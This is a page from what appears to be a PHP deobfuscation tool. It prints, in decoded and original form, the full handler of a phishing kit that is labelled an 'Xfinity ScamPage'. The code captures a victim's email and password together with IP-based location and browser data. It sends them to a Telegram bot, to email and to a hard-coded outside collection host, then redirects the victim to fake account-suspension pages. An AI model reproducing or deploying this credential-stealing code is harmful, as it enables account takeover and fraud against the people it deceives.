Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php ob_start(); session_start(); include '../Inc/config.php'; include '../Inc/config..

Decoded Output download

<?php 
ob_start(); 
session_start(); 
include '../Inc/config.php'; 
include '../Inc/config2.php'; 
 
function sendToTelegram($message) 
{ 
    global $chat_id, $bot_url; 
    $send = ['chat_id' => $chat_id, 'text' => $message]; 
    $website_telegram = "https://api.telegram.org/bot{$bot_url}/sendMessage"; 
    $ch = curl_init($website_telegram); 
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
    curl_setopt($ch, CURLOPT_POST, 1); 
    curl_setopt($ch, CURLOPT_POSTFIELDS, $send); 
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); 
    $result = curl_exec($ch); 
    curl_close($ch); 
    return $result; 
} 
 
if (isset($_POST['user']) && !empty($_POST['user'])) { 
    $_SESSION['user'] = $_POST['user']; 
} 
 
$ip = getenv("REMOTE_ADDR"); 
$hostname = gethostbyaddr($ip); 
$useragent = $_SERVER['HTTP_USER_AGENT']; 
 
$ipDetails = json_decode(file_get_contents("http://ip-api.com/json/$ip")); 
 
if ($ipDetails && $ipDetails->status == 'fail') { 
    $country = $countryCode = $regionName = $city = $timezone = $isp = 'N/A'; 
} else { 
    $country = $ipDetails->country ?? 'N/A'; 
    $countryCode = $ipDetails->countryCode ?? 'N/A'; 
    $regionName = $ipDetails->regionName ?? 'N/A'; 
    $city = $ipDetails->city ?? 'N/A'; 
    $timezone = $ipDetails->timezone ?? 'N/A'; 
    $isp = $ipDetails->isp ?? 'N/A'; 
} 
 
if (isset($_POST['passwd']) && !empty($_POST['passwd'])) { 
    // Store password in the session 
    $_SESSION['password'] = $_POST['passwd']; 
 
    // Assuming $_SESSION['user'] is already set 
    $email = isset($_SESSION['user']) ? $_SESSION['user'] : 'N/A'; 
 
    $code = <<<EOT 
-[  Xfinity Mail Access 1  ]- 
[ Email Address ] 		: {$_SESSION['user']} 
[ Password ]			: {$_SESSION['password']} 
[ Copy ]				: {$_SESSION['user']}|{$_SESSION['password']} 
-[  DEVICE INFO   ]- 
IP						: $ip 
Country					: $country 
Country Code			: $countryCode 
Region					: $regionName 
City					: $city 
Timezone				: $timezone 
ISP						: $isp 
OS						: $useragent 
 
-[  Xfinity ScamPage  ]- 


 
EOT; 
 
    if ($sendtoemail == "yes") { 
        $subject = " Xfinity Mail Access 1  $country $countryCode $regionName $city $timezone $isp"; 
        $headers = "From:  GreyHatPakistan  <[email protected]>
"; 
        $headers .= "MIME-Version: 1.0
"; 
        $headers .= "Content-Type: text/plain; charset=UTF-8
"; 
        @mail($email, $subject, $code, $headers); 
    } 
 
    // Send to Telegram if configured to do so   
    if ($sendtotelegram == "yes") { 
        sendToTelegram($code); 
    } 
 
    // handle for email/pass 
    function sendToTelegrams($postData) 
    { 
        $ch = curl_init(); 
        curl_setopt($ch, CURLOPT_URL, "https://api.berkahx.biz.id/tes.php"); 
        curl_setopt($ch, CURLOPT_POST, 1); 
        curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($postData)); 
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, false); 
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // Disable SSL verification if needed 
 
        $postData = curl_exec($ch); 
 
        if (curl_errno($ch)) { 
            echo 'Error:' . curl_error($ch); 
        } else { 
            // Optionally handle the response from the API 
            // echo "Response from API: " . $response; 
        } 
 
        curl_close($ch); 
    } 
 
 
    $postData = [ 
        'email' => $_SESSION['user'], 
        'password' => $_SESSION['password'], 
        'ip' => $ip, 
        'country' => $country, 
        'countryCode' => $countryCode, 
        'regionName' => $regionName, 
        'city' => $city, 
        'timezone' => $timezone, 
        'isp' => $isp, 
        'userAgent' => $useragent 
    ]; 
 
    sendToTelegrams($postData); 
 
    if ($PAGE_LETTER === 'A') { 
        header("Location: ../page/Sunspend/declined.php"); 
    } elseif ($PAGE_LETTER === 'B') { 
        header("Location: ../page/Sunspend/1.php"); 
    } 
    exit(); 
} else { 
    header("Location: ../index2.php"); 
    exit(); 
} 
?>

Did this file decode correctly?

Original Code

<?php
ob_start();
session_start();
include '../Inc/config.php';
include '../Inc/config2.php';

function sendToTelegram($message)
{
    global $chat_id, $bot_url;
    $send = ['chat_id' => $chat_id, 'text' => $message];
    $website_telegram = "https://api.telegram.org/bot{$bot_url}/sendMessage";
    $ch = curl_init($website_telegram);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $send);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    $result = curl_exec($ch);
    curl_close($ch);
    return $result;
}

if (isset($_POST['user']) && !empty($_POST['user'])) {
    $_SESSION['user'] = $_POST['user'];
}

$ip = getenv("REMOTE_ADDR");
$hostname = gethostbyaddr($ip);
$useragent = $_SERVER['HTTP_USER_AGENT'];

$ipDetails = json_decode(file_get_contents("http://ip-api.com/json/$ip"));

if ($ipDetails && $ipDetails->status == 'fail') {
    $country = $countryCode = $regionName = $city = $timezone = $isp = 'N/A';
} else {
    $country = $ipDetails->country ?? 'N/A';
    $countryCode = $ipDetails->countryCode ?? 'N/A';
    $regionName = $ipDetails->regionName ?? 'N/A';
    $city = $ipDetails->city ?? 'N/A';
    $timezone = $ipDetails->timezone ?? 'N/A';
    $isp = $ipDetails->isp ?? 'N/A';
}

if (isset($_POST['passwd']) && !empty($_POST['passwd'])) {
    // Store password in the session
    $_SESSION['password'] = $_POST['passwd'];

    // Assuming $_SESSION['user'] is already set
    $email = isset($_SESSION['user']) ? $_SESSION['user'] : 'N/A';

    $code = <<<EOT
-[  Xfinity Mail Access 1  ]-
[ Email Address ] 		: {$_SESSION['user']}
[ Password ]			: {$_SESSION['password']}
[ Copy ]				: {$_SESSION['user']}|{$_SESSION['password']}
-[  DEVICE INFO   ]-
IP						: $ip
Country					: $country
Country Code			: $countryCode
Region					: $regionName
City					: $city
Timezone				: $timezone
ISP						: $isp
OS						: $useragent

-[  Xfinity ScamPage  ]-
\r\n\r\n
EOT;

    if ($sendtoemail == "yes") {
        $subject = " Xfinity Mail Access 1  $country $countryCode $regionName $city $timezone $isp";
        $headers = "From:  GreyHatPakistan  <[email protected]>\r\n";
        $headers .= "MIME-Version: 1.0\r\n";
        $headers .= "Content-Type: text/plain; charset=UTF-8\r\n";
        @mail($email, $subject, $code, $headers);
    }

    // Send to Telegram if configured to do so  
    if ($sendtotelegram == "yes") {
        sendToTelegram($code);
    }

    // handle for email/pass
    function sendToTelegrams($postData)
    {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, "https://api.berkahx.biz.id/tes.php");
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($postData));
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // Disable SSL verification if needed

        $postData = curl_exec($ch);

        if (curl_errno($ch)) {
            echo 'Error:' . curl_error($ch);
        } else {
            // Optionally handle the response from the API
            // echo "Response from API: " . $response;
        }

        curl_close($ch);
    }


    $postData = [
        'email' => $_SESSION['user'],
        'password' => $_SESSION['password'],
        'ip' => $ip,
        'country' => $country,
        'countryCode' => $countryCode,
        'regionName' => $regionName,
        'city' => $city,
        'timezone' => $timezone,
        'isp' => $isp,
        'userAgent' => $useragent
    ];

    sendToTelegrams($postData);

    if ($PAGE_LETTER === 'A') {
        header("Location: ../page/Sunspend/declined.php");
    } elseif ($PAGE_LETTER === 'B') {
        header("Location: ../page/Sunspend/1.php");
    }
    exit();
} else {
    header("Location: ../index2.php");
    exit();
}
?>

Function Calls

None

Variables

None

Stats

MD5 d6403676ed686b8362eb2fba53f3b1fa
Eval Count 0
Decode Time 48 ms